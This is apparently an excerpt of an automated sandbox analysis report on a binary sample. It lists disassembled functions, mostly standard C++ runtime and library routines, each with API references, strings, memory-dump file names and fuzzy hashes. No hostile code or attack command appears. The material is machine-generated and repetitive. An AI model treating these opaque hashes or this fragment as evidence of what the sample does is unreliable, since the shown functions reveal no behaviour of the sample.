                                            • Part of subcall function 009F4760: __CxxThrowException@8.LIBVCRUNTIME ref: 009F482B
                                            • Part of subcall function 009F4760: ___std_exception_copy.LIBVCRUNTIME ref: 009F4882
                                          Strings
                                          • FilterWithBufferedInput: invalid buffer size, xrefs: 009FC3F8
                                          • w#G!, xrefs: 009FC2C4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$___std_exception_copy
                                          • String ID: FilterWithBufferedInput: invalid buffer size$w#G!
                                          • API String ID: 4178755008-1068819232
                                          • Opcode ID: 5068c8ef6aae0e25fe44e492d60b095df4181ae986b87162fe617f00f1f0fdc2
                                          • Instruction ID: 14b26e867c3306773604106db95eaa741065431f512863847f8f1ff277a6f8de
                                          • Opcode Fuzzy Hash: 5068c8ef6aae0e25fe44e492d60b095df4181ae986b87162fe617f00f1f0fdc2
                                          • Instruction Fuzzy Hash: AF41B9B0900748DFDB20CF68C905B9ABBF4FF48724F108A1DE5569B381C7B5AA09CB90
                                          Function 00A5A975 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A5A99A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: 7ae626a1a197784a85a269fe1130440daa72ff83fbc1e85f44e61a63a6d305eb
                                          • Instruction ID: c5386ff86841915adbbf71e59c5229876087a841f4c0be3334f1658cff03052f
                                          • Opcode Fuzzy Hash: 7ae626a1a197784a85a269fe1130440daa72ff83fbc1e85f44e61a63a6d305eb
                                          • Instruction Fuzzy Hash: 24417971A00109AFCF15CF98CE81AEE7BB5BF58341F158259FE04A6221E3359D54DB52
                                          Function 00A36A31 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 00A36A38
                                            • Part of subcall function 00A2B22F: __EH_prolog3.LIBCMT ref: 00A2B236
                                            • Part of subcall function 00A2B22F: std::_Lockit::_Lockit.LIBCPMT ref: 00A2B240
                                            • Part of subcall function 00A2B22F: std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B2B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                          • String ID: %.0Lf$0123456789-
                                          • API String ID: 2728201062-3094241602
                                          • Opcode ID: a8fdcf59d2e7af03106fb2130e24e9407fffa1e5fc08fac1149530f094c0ae5f
                                          • Instruction ID: 635020109401e21b1e2dd7a1c4a5ba6f59996455f474e19573f9f216d81f3090
                                          • Opcode Fuzzy Hash: a8fdcf59d2e7af03106fb2130e24e9407fffa1e5fc08fac1149530f094c0ae5f
                                          • Instruction Fuzzy Hash: 34415E32A00219EFCF05DF98C984AEEBBB2FF49314F548059F901BB255DB709A56CB91
                                          Function 00A36CD1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 00A36CD8
                                            • Part of subcall function 009EC470: std::_Lockit::_Lockit.LIBCPMT ref: 009EC4BC
                                            • Part of subcall function 009EC470: std::_Lockit::_Lockit.LIBCPMT ref: 009EC4DE
                                            • Part of subcall function 009EC470: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC4FE
                                            • Part of subcall function 009EC470: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC5FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                          • String ID: 0123456789-$0123456789-
                                          • API String ID: 2088892359-2494171821
                                          • Opcode ID: 3f6d9ba6e19bdc7fd6b051a5f0299d9f7321941d18dd54a953fdca241d41da61
                                          • Instruction ID: d8a5d4ac1b1d0d6d3298e4a3e60122c9348d1abb8c2781d13eeb21edb3e662b6
                                          • Opcode Fuzzy Hash: 3f6d9ba6e19bdc7fd6b051a5f0299d9f7321941d18dd54a953fdca241d41da61
                                          • Instruction Fuzzy Hash: 2A41AE32A00619EFCF05DF94C980AEE7BB2FF45314F144059F801AB265DB30AE56CBA1
                                          Function 009E0940 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForMultipleObjectsEx.KERNEL32(00000002,00000000,00000001,000000FF,00000000,21472377,?,?,?,?,?,?,?,?,00000000,00A89978), ref: 009E09E0
                                            • Part of subcall function 009B4CA0: ___std_exception_copy.LIBVCRUNTIME ref: 009B4CDE
                                            • Part of subcall function 009E9440: __CxxThrowException@8.LIBVCRUNTIME ref: 009E9461
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8MultipleObjectsThrowWait___std_exception_copy
                                          • String ID: w#G!$w#G!
                                          • API String ID: 2380241787-1134387879
                                          • Opcode ID: cc224d7266827d568eba9212581fd43c6c03295c3d0e8af1d9b1f93e0b20b364
                                          • Instruction ID: 26a043e823914d0730badd78a743343931f7cf2327a1a3c34a2c18a4b3441e6c
                                          • Opcode Fuzzy Hash: cc224d7266827d568eba9212581fd43c6c03295c3d0e8af1d9b1f93e0b20b364
                                          • Instruction Fuzzy Hash: 5C31E475A002059FE715DF5ADC42BAAB7B9FF84710F24413EE906A7381DBB46D41CB90
                                          Function 009FAAE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FAB31
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 009FAB08
                                          • w#G!, xrefs: 009FAAF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: PK_MessageAccumulator: TruncatedFinal() should not be called$w#G!
                                          • API String ID: 3976011213-2654151947
                                          • Opcode ID: cee6e0e6760043665e71d9c861cafb7dd8e4f53d1c5bc739eeca996b5f8df259
                                          • Instruction ID: a39461cadc6be11db9b1ffcb8712fed6dea5f49e5e316bae77da1cd20582210c
                                          • Opcode Fuzzy Hash: cee6e0e6760043665e71d9c861cafb7dd8e4f53d1c5bc739eeca996b5f8df259
                                          • Instruction Fuzzy Hash: 4B315E756002049FCB04DF65C885EAEBBE9FF98350F150569F901D72A1DB31DD15CB91
                                          Function 009B2D50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Wcrtomb
                                          • String ID: w#G!
                                          • API String ID: 2723506260-519468572
                                          • Opcode ID: 5baff46c273c21a6d5a57dc10946ca2bc9cb8595471337a8ff598be223644611
                                          • Instruction ID: 25d01c53d7a2463e7a30a3474e9d1e716710d6f559d5dcdd6a1df025d85b6576
                                          • Opcode Fuzzy Hash: 5baff46c273c21a6d5a57dc10946ca2bc9cb8595471337a8ff598be223644611
                                          • Instruction Fuzzy Hash: 53312CB5A0020ADFCB04DF99D9919BEB7F5FF98310B20446AE95697341E734ED20CBA0
                                          Function 00A8205D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __dosmaperr_free
                                          • String ID: SystemRoot
                                          • API String ID: 3116789124-2034820756
                                          • Opcode ID: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                          • Instruction ID: 8e42893ed5e1cb345209b44e6c333d86354b94d21b2f569e12a18a62527848e3
                                          • Opcode Fuzzy Hash: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                          • Instruction Fuzzy Hash: 3F213A36A042159FEB29AF78DC51BB977B5EFC6720F298199F8458B341C6329D01C790
                                          Function 009D0D70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009D0E84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: .PBF$w#G!
                                          • API String ID: 323602529-4168750012
                                          • Opcode ID: b6b516bf528111990e610e817307cfed3821908684f0fe0fb10e235e4e06943b
                                          • Instruction ID: 5413d81c5cec7e1ae196902bc9fcfab0e3af2ab8454437e372f8bd876d9548f9
                                          • Opcode Fuzzy Hash: b6b516bf528111990e610e817307cfed3821908684f0fe0fb10e235e4e06943b
                                          • Instruction Fuzzy Hash: B6412274A08246CFD711CF29C588AA9FBE9FF49708F1581ADE8098B391D731E955CF50
                                          Function 009EE6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009EE6F8
                                            • Part of subcall function 009ECC20: ___std_exception_copy.LIBVCRUNTIME ref: 009ECC63
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009EE7E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy$___std_exception_destroy
                                          • String ID: w#G!
                                          • API String ID: 4019986568-519468572
                                          • Opcode ID: 4a4daf961d7285216b8801b1ed6cabb96157325a0b444e008d313804504b6710
                                          • Instruction ID: 70abdccf938d469a5b568755f0828ddda1809c3cc72fdbc88a26762ba811d85b
                                          • Opcode Fuzzy Hash: 4a4daf961d7285216b8801b1ed6cabb96157325a0b444e008d313804504b6710
                                          • Instruction Fuzzy Hash: 72414FB5A10649EFCF04CF58D944A9DFBF4FF48308F108259E918AB711D771A904CBA4
                                          Function 00A7E369 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00A7E5C4,00000000,00000050,?,?,?,?,?), ref: 00A7E444
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 6c347a0f166bf6c98ee6de14502798c23ac2ec17396a5a99ac1e7be92a734a18
                                          • Instruction ID: 55da38ec23e2ec83678d91b46f67ba66a6da3ae36e3e352536c5a3f1ad16f06b
                                          • Opcode Fuzzy Hash: 6c347a0f166bf6c98ee6de14502798c23ac2ec17396a5a99ac1e7be92a734a18
                                          • Instruction Fuzzy Hash: 6021A473B40100A6EB34CB648D41B9773A6AB59B10F5AC5A4E90EDB241F733DD008350
                                          Function 00A34269 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A2D7E7: __EH_prolog3_GS.LIBCMT ref: 00A2D7F1
                                          • std::_Stofx_v2.LIBCPMT ref: 00A342D4
                                          • _ldexpf.LIBCPMT ref: 00A3431A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3_Stofx_v2_ldexpfstd::_
                                          • String ID: w#G!
                                          • API String ID: 1444608790-519468572
                                          • Opcode ID: 0eba0118abaaf4923037c05b6c2e33267a9c058204c86da8855168284c5873fe
                                          • Instruction ID: babada3d116174ab1ed97bf816163c9489ce78c93ddaec0b421f3057e8d78c28
                                          • Opcode Fuzzy Hash: 0eba0118abaaf4923037c05b6c2e33267a9c058204c86da8855168284c5873fe
                                          • Instruction Fuzzy Hash: 19312C71A002199BCB15DF58DD81AEAB7BCEF0C300F9091AAF51AA7141D734AF54CF64
                                          Function 00A3E7A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3E865
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: boost::filesystem::path codecvt to string$w#G!
                                          • API String ID: 2005118841-2763089600
                                          • Opcode ID: 022478f60478b5bae23e7070a8b8add15dec3929f585ab24783a4f8bb4f045f2
                                          • Instruction ID: 0998d4d6eaca742d0f2bc8d981c3eb6dbea5b134aa715330efd478f185fb8aa2
                                          • Opcode Fuzzy Hash: 022478f60478b5bae23e7070a8b8add15dec3929f585ab24783a4f8bb4f045f2
                                          • Instruction Fuzzy Hash: F3218676A04314AFC704DEA8DD8586BB3E9EFC9300F040A1DF94197240D670FC088BA2
                                          Function 00A34BA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A2DEC1: __EH_prolog3_GS.LIBCMT ref: 00A2DECB
                                          • std::_Stofx_v2.LIBCPMT ref: 00A34C0F
                                          • _ldexpf.LIBCPMT ref: 00A34C55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3_Stofx_v2_ldexpfstd::_
                                          • String ID: w#G!
                                          • API String ID: 1444608790-519468572
                                          • Opcode ID: 9cc8275767d0675b10c698d7e0616edc9d6295241130ff0a68278ca34e02e689
                                          • Instruction ID: 0574e4b1a537e5dc9a3cc83025b0735bb217181b7cb0de57f30179a5f8d4bdeb
                                          • Opcode Fuzzy Hash: 9cc8275767d0675b10c698d7e0616edc9d6295241130ff0a68278ca34e02e689
                                          • Instruction Fuzzy Hash: 96314B719012199BDB15DF54DD81AEAB7BCEB4C300F44919AF50AA3141D734AF55CF60
                                          Function 009DED00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009E7780: std::locale::_Init.LIBCPMT ref: 009E77C5
                                            • Part of subcall function 009E61A0: std::_Lockit::_Lockit.LIBCPMT ref: 009E61FA
                                            • Part of subcall function 009E61A0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009E6242
                                            • Part of subcall function 009E61A0: __Getcvt.LIBCPMT ref: 009E624B
                                          • std::locale::_Init.LIBCPMT ref: 009DED8E
                                            • Part of subcall function 00A289F6: __EH_prolog3.LIBCMT ref: 00A289FD
                                            • Part of subcall function 00A289F6: std::_Lockit::_Lockit.LIBCPMT ref: 00A28A08
                                            • Part of subcall function 00A289F6: std::locale::_Setgloballocale.LIBCPMT ref: 00A28A23
                                            • Part of subcall function 00A289F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00A28A79
                                            • Part of subcall function 009EB050: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 009EB06D
                                            • Part of subcall function 009EB050: std::_Lockit::_Lockit.LIBCPMT ref: 009EB08D
                                            • Part of subcall function 009EB050: std::_Lockit::~_Lockit.LIBCPMT ref: 009EB0AE
                                            • Part of subcall function 009EB050: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 009EB0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockitstd::locale::_$Lockit::_$InitLocimp::_Lockit::~_$AddfacGetcvtH_prolog3LocimpLocimp_Locinfo::_Locinfo_ctorNew_Setgloballocale
                                          • String ID: Dflt$w#G!
                                          • API String ID: 4135119788-2762319387
                                          • Opcode ID: 3dbf0911d24590fb1280bcbdcf66fcaba9c83ecd55eb2784829db2874a2b3785
                                          • Instruction ID: 5bb7dc44f0bee47b8b1fe2825284a913418e4a4fa915ae54a7e4491197cad27c
                                          • Opcode Fuzzy Hash: 3dbf0911d24590fb1280bcbdcf66fcaba9c83ecd55eb2784829db2874a2b3785
                                          • Instruction Fuzzy Hash: 3B31AA70A00A44DFD711EF64C944B6ABBF4FF48700F14866DE6069BB91DB72A944CB91
